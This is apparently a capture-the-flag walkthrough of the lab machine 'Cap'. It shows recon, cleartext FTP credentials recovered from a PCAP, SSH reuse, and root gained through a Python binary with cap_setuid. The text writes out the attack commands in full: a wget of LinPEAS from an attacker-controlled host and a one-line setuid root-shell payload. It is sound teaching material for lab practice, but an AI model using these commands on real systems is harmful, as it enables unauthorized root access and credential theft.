Cap | Linux
Difficulty: Easy–Medium
Tags: PCAP, FTP creds, SSH, privesc, capabilities
Tools Used: Nmap, Gobuster, Wireshark, LinPEAS, getcap, Python

A surgical box with a lesson in stealth. Cap walks you through a practical, real-world example of how cleartext protocols and Linux capabilities combine into a clean escalation path. No guessing games. No overengineered rabbit holes. Just methodical recon, tight analysis, and one bad permission away from root.

Initial Enumeration

We start with a fast scan to get the lay of the land:

nmap -sC -F 10.129.205.117 -oN init-scan

The results gave us three targets:

• FTP on port 21

• SSH on port 22

• HTTP on port 80 (served via Gunicorn)

With web services running, we turn to Gobuster to surface hidden paths:

gobuster dir --url http://10.129.205.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Found: /capture/ — a directory serving downloadable .pcap files.

Credential Hunting via PCAP

Pulled the first file:

http://10.129.205.117/capture/0

Opened it in Wireshark. Within seconds, caught a login exchange over FTP—classic cleartext leak.

Request: USER ***an  
Request: PASS *********RM3!

FTP + PCAP = plaintext creds. An old problem, still deadly.

Logged in via FTP:

ftp 10.129.205.117

Used the credentials, got in clean, and grabbed the user.txt flag.

SSH Access & Local Enumeration

Reused the same creds over SSH:

ssh user@10.129.205.117

No sudo perms:

sudo -l

No juicy cron jobs, no fun SUIDs. Time to bring in LinPEAS.

Uploaded and executed:

python3 -m http.server 5555   # on attacker box
wget http://<attacker-ip>:5555/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

LinPEAS ran loud but revealed nothing immediate. So we go quiet—manual post-ex checks.

Linux Capabilities ➤ Root

Linux capabilities break root privileges into finer-grained access. That’s good for security—until someone assigns the wrong capability to the wrong binary.

Time to scan:

getcap -r / 2>/dev/null

Found:

/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

That cap_setuid is the crown jewel. It lets this Python binary assume any UID, including root. No SUID bit. No alarms.

From GTFOBins:

/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Boom. Root shell.

Final proof:

whoami
root
cat /root/root.txt

Summary & Review

This machine is tight, quiet, and effective:

User path:

• Web enum ➤ /capture/

• PCAP analysis ➤ FTP creds

• FTP login ➤ user flag

Root path:

• SSH reuse ➤ shell as user

• LinPEAS ➤ no hits

• Manual getcap ➤ Python with cap_setuid

• GTFOBins ➤ root shell via Python

Command Recap

nmap -sC -F 10.129.205.117 -oN init-scan  
gobuster dir --url http://10.129.205.117 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt  
# Download PCAP and open in Wireshark  
ftp 10.129.205.117  
ssh user@10.129.205.117  
python3 -m http.server 5555  
wget http://<attacker-ip>:5555/linpeas.sh  
chmod +x linpeas.sh && ./linpeas.sh  
getcap -r / 2>/dev/null  
/usr/bin/python3.8 -c 'import os; os.setuid(0); os.system("/bin/bash")'

Final Thoughts

FTP creds in the open. Python with quiet privileges. No noise, just precision.

Cap proves that small oversights become massive attack surfaces when chained right. Always check PCAPs. Always check capabilities.

Another one rooted. On to the next.